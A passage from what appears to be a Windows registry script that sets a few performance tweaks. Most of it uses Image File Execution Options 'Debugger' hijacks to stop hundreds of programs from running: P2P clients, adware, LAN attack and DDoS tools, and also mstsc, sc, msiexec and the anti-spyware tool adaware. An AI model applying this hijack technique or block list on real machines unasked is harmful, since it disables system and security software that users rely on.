/>[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer]<br />"Link"=hex:00,00,00,00<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters]<br />"EnablePrefetcher"=dword:00000003<br />[HKEY_USERS\.DEFAULT\Control Panel\Desktop]<br />"FontSmoothing"="2"<br />"FontSmoothingType"=dword:00000002<br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]<br />"MaxConnectionsPer1_0Server"=dword:00000008<br />"MaxConnectionsPerServer"=dword:00000008<br />[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control]<br />"WaitToKillServiceTimeout"="1000"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Shareaza.exe]<br />"Debugger"="c:\\中國超級BT.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\4047.exe]<br />"Debugger"="c:\\中國超級BT捆綁的病毒.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TuoTu.exe]<br />"Debugger"="c:\\P2P類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qqfo1.0_dl.exe]<br />"Debugger"="c:\\P2P類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SuperLANadmin.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPcap30.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPcap.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Robocop.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diaoxian.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\network.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\冰點還原終結者.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389.rar]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mstsc.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389dl.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389dl.rar]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\黑社會.exe]<br />"Debugger"="c:\\破壞類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Poco2004.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Vagaa.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kamun.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\黑社會.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\還原精靈密碼察看器.exe]<br />"Debugger"="bcvb"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yuyuyu.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KuGoo.exe]<br />"Debugger"="c:\\下載類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmcc.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bczp.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3721.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PodcastBarMiniStarter.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cdnns.dll]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cdnns.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupcnnic.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SurfingPlus.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ok.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\123.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IESearch.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSC32.dll]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ZComService.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\skin.dll]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zPlatform.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zcomUpdate.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hbhelper.dll]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Weather_24.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Weather.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inkv3.dll]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDE.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boba_super_setup-1.1.0.15.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PodcastBarMini.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PodcastBarMiniStarter.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sogou_yahoo.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SkypeClient.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_aHR0cDovL3d3dy5xeXVsZS5jb20v.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Qyule.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lianmeng_sitesowang.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iShare.Ver0.40.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ishare_user.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\assist4.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bbseesetup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Crack.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bind_8286.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RedVIP.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VIP.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iShare.Ver0.40.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ishare_user.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\assist4.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bbseesetup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p2psvr.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQSSV20.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQSSV1.8.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SixthSense.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netrobocop_setup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetRobocop.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-8CIEP.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPca.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinPca_3.1.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\P2P網絡管理員.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ARPOver.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cnnetcut.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\INSEC.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netcut.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DrvIst.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSIF1.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetMon.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LanecatTrial.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LEC_Client.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BTBaby.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebThunder1.0.4.28deluxbeta.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebThunder.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Thunder5.1.6.198.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ThunderMini2.0.0.29.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-TEQG7.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TingTing1.1.0.8Beta.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-C6R99.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-00KC0.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BitComet_0.68_setup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BitComet.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BitComet0.62.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\100baoSetup120.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLBD.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DDD4_DXT168.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ppstreamsetup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PPStream.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TV100.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-S5LOA.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-S5L0A.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\teng.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TENG.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-RP216.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rongtv.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hjsetup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HJSETUP.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msiexec.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rep.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dudupros.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DuDuAcc.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Dmad-install.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\D-mad.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\004-PPGou-Dmad.EXE]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PPGou.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kugoo.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KuGoo.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDUpdate.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PodcastBarMini.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MyShares.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vfp02.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\is-5SKT1.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bgoomain.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup_L0029.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ns40.tmp]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1032.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yAssistSe.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ddos.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BitTorrent.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Win98局域網攻擊工具.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NetThief.exe]<br />"Debugger"="c:\\網絡神偷.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RemoteComputer.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQTailer.exe]<br />"Debugger"="c:\\制造出來的QQ病毒.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\傀儡僵屍<span style="color:black;">DDOS</span>攻擊集合.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Alchem.exe]<br />"Debugger"="c:\\以下是存在風險病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\actalert.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aqadcup.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\archive.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\arr.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ARUpdate.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\asm.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\av.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avserve.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avserve2.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\backWeb.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bargains.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\basfipm.exe]<br />"Debugger"="c:\\病毒類.exe"<br /><br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 